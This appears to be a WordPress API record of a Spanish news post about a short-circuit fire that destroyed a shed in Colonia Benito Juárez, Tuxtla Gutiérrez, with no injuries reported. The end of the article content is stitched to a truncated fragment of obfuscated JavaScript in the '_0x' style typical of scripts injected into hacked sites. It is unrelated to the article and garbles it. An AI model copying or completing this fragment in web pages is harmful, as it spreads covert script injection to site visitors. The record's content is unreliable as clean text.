{"id":20751,"date":"2025-03-05T05:56:42","date_gmt":"2025-03-05T05:56:42","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20751"},"modified":"2025-03-05T05:56:43","modified_gmt":"2025-03-05T05:56:43","slug":"sofocan-incendio-de-galera-en-la-colonia-juarez","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20751","title":{"rendered":"Sofocan incendio de galera en la Colonia Ju\u00e1rez"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250304-WA0042-1024x768.jpg\" alt=\"\" class=\"wp-image-20752\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250304-WA0042-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250304-WA0042-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250304-WA0042-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250304-WA0042-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250304-WA0042-2048x1536.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 4 de marzo del 2025. Tuxtla Guti\u00e9rrez.- Este lunes se incendi\u00f3 una galera localizada en la Prolongaci\u00f3n de la Avenida Doctor Manuel Velasco Su\u00e1rez de la Colonia Benito Ju\u00e1rez de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que este hecho ocurri\u00f3 presuntamente ocurri\u00f3 un corto circuito ocasionando el fuego que se extendi\u00f3 por toda la madera y l\u00e1minas.<\/p>\n\n\n\n<p>Al lugar arribaron elementos de Bomberos para sofocar el incendio con equipo presurizado.<\/p>\n\n\n\n<p>El fuego tambi\u00e9n alcanz\u00f3 madera, muebles, tanques de gas y objetos de pl\u00e1stico.<\/p>\n\n\n\n<p>Afortunadamente no hubo heridos ni decesos que lamentar.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 4 de marzo del 2025. Tuxtla Guti\u00e9rrez.- Este lunes se incendi\u00f3 una galera localizada en la Prolongaci\u00f3n de la Avenida Doctor Manuel Velasco Su\u00e1rez de la Colonia Benito Ju\u00e1rez de Tuxtla Guti\u00e9rrez. Los reportes oficiales informaron que este hecho ocurri\u00f3 presuntamente ocurri\u00f3 un corto circuito ocasionando el fuego que se extendi\u00f3 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20752,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-20751","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20751","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20751"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20751\/revisions"}],"predecessor-version":[{"id":20753,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20751\/revisions\/20753"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20752"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20751"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20751"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20751"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}